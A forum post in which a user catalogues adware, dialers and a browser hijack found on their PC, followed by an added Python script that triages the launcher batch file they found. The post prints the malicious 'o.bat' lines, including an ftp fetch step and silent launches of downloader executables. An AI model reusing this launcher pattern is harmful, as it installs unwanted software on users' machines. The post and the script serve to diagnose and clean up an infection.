scoutsout
Minstrel Boy
Last night this was the only site I logged onto - therefore, I believe the things that were foisted onto my machine came from, or through, this site. I left the connection on when I went to bed. At some point the connection was dropped (thanks for small favors).
After closing down some "risque" browser windows, I re-booted. After the machine came back up, the "dial-up dialog" immediately popped up. Hmmm... something is trying to "phone home".
I found the following modifications to my system:
Running processes
loader
id53
pef
New desktop Icons:
Lycos Sidesearch
appears to be a browser hijack
0021-bdl94126.exe
No information given in "properties", but icon was a "setup" icon.
CS4P20.exe
Company Name: Clear Search
Product Name: Loader
"o"
No information given in "properties"
"o.bat"
Commands as follows:
if not exist C:\WINDOWSstatuslog ftp -s
if exist install2.exe install2.exe
if exist infamous_downloader.exe infamous_downloader.exe
if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
if exist CS4P028.exe CS4P028.exe
if exist silent.exe silent.exe
"infamous_downloader.exe",
No information given in "properties"
install2.exe
Company Name: TODO
Product Name: Spawner.exe
silent.exe
No information given in "properties"
New folder under c: "installer", with "id53.exe" in it
New folder under c: "temporary", with stcterms.html in it
New Windows Startup Items:
PowerReg Scheduler.exe
PowerRegSchedulerV3.exe
In c:\windows
"infamous.exe"
In the program files directory
New Folder "Lycos"
New programs "over.exe" and "pup.exe"
After cleaning all of this crap out, starting Internet Explorer, my browser was hijacked to the following:
http://default-homepage-network.com/start.cgi?hkcu
This morning I see we now have popup windows on the forums side of CFC. That really is too bad.
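For triage of a launcher script like the "o.bat" listed in the post, the following added example (not part of the original post) separates the `if exist` launch lines from the network step and cross-checks the launch targets against the executable names the post lists among the new files. The names `triage`, `cross_reference` and `NET_TOOLS` are hypothetical, and the batch text is copied as the post shows it, including its first line as-is.

```python
import re

# Batch lines copied from the o.bat listing in the post above.
O_BAT = r"""if not exist C:\WINDOWSstatuslog ftp -s
if exist install2.exe install2.exe
if exist infamous_downloader.exe infamous_downloader.exe
if exist 0021-bdl94126.EXE 0021-bdl94126.EXE
if exist CS4P028.exe CS4P028.exe
if exist silent.exe silent.exe
"""

# Executable names the post lists among the new files it found.
OBSERVED = ["0021-bdl94126.exe", "CS4P20.exe", "infamous_downloader.exe",
            "install2.exe", "silent.exe"]

IF_EXIST = re.compile(r"^\s*if\s+(not\s+)?exist\s+(\S+)\s+(.+?)\s*$", re.I)
NET_TOOLS = {"ftp", "tftp"}  # assumption: commands treated as a network fetch

def triage(script):
    """Split 'if [not] exist' lines into launches, network steps and the rest."""
    launches, network, other = [], [], []
    for line in script.splitlines():
        m = IF_EXIST.match(line)
        if not m:
            if line.strip():
                other.append(line.strip())
            continue
        negated, guard, command = m.group(1), m.group(2), m.group(3)
        tool = command.split()[0].lower()
        if tool in NET_TOOLS:
            network.append({"guard": guard, "negated": bool(negated), "command": command})
        elif not negated and tool == guard.lower():
            launches.append(guard.lower())  # runs the file it just tested for
        else:
            other.append(line.strip())
    return launches, network, other

def cross_reference(launches, observed):
    """Compare script launch targets with file names seen on disk."""
    seen = {name.lower() for name in observed}
    return {"launched_and_seen": sorted(seen & set(launches)),
            "launched_not_seen": sorted(set(launches) - seen),
            "seen_not_launched": sorted(seen - set(launches))}

if __name__ == "__main__":
    launches, network, other = triage(O_BAT)
    print(network)
    print(cross_reference(launches, OBSERVED))
```

On the post's own data this shows one mismatch worth following up during cleanup: the script launches `CS4P028.exe`, while the file listed in the post is `CS4P20.exe`.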